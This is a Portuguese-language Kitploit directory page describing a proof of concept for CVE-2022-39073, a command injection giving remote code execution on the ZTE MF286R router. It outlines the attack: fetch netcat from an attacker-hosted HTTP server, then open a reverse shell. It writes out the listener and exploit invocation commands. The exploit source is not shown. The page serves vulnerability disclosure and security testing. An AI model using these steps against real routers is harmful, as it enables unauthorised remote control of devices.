Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-39073 — Prova de conceito da vulnerabilidade de injeção de comandos que afeta o roteador ZTE MF286R, incluindo um exploit de RCE. | Kitploit
Ferramentas/GitHubGitHub/v0lp3/cve-2022-39073
Segurança IoTAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleFerramenta de Acesso Remoto
GitHubv0lp3/cve-2022-39073

CVE-2022-39073

Prova de conceito da vulnerabilidade de injeção de comandos que afeta o roteador ZTE MF286R, incluindo um exploit de RCE.

Ver Repositório
11412há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-39073

Detalhes do firmware:

root@kitploit:~
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10

Pré-requisitos

  • requests (pip install requests)

Injeção de Comando

A vulnerabilidade é uma injeção de comando compartilhada entre o binário zte_net_link_detect e o manipulador WATCH_DOG_SWITCH no servidor web binário goahead.

Observe que a vulnerabilidade só pode ser explorada quando o roteador está conectado à WAN ou à Internet via um cartão SIM. (O valor da chave "ppp_status" deve ser "ppp_connected" ou "ipv4_ipv6_connected" ou "ipv6_connected").

Riscos

  • Execução remota de código (RCE)
  • Execução arbitrária de comandos

Prova de Conceito

A ideia do exploit é baixar o binário estático do netcat de um servidor http e então abrir um shell reverso com ele. P.S.: O netcat incluído nesta pasta é big endian.

  • Abra um servidor http neste diretório python3 -m http.server 8080
  • Abra um socket de escuta na porta 9999 com nc -lvp 9999
  • Execute o script nesta pasta python3 exploit.py http://<router> <admin_password> <attacker_ip, ex: 192.168.1.101>

Referências

Esta vulnerabilidade foi reportada por Andrea Maugeri em setembro de 2022. https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664

Baixar ferramenta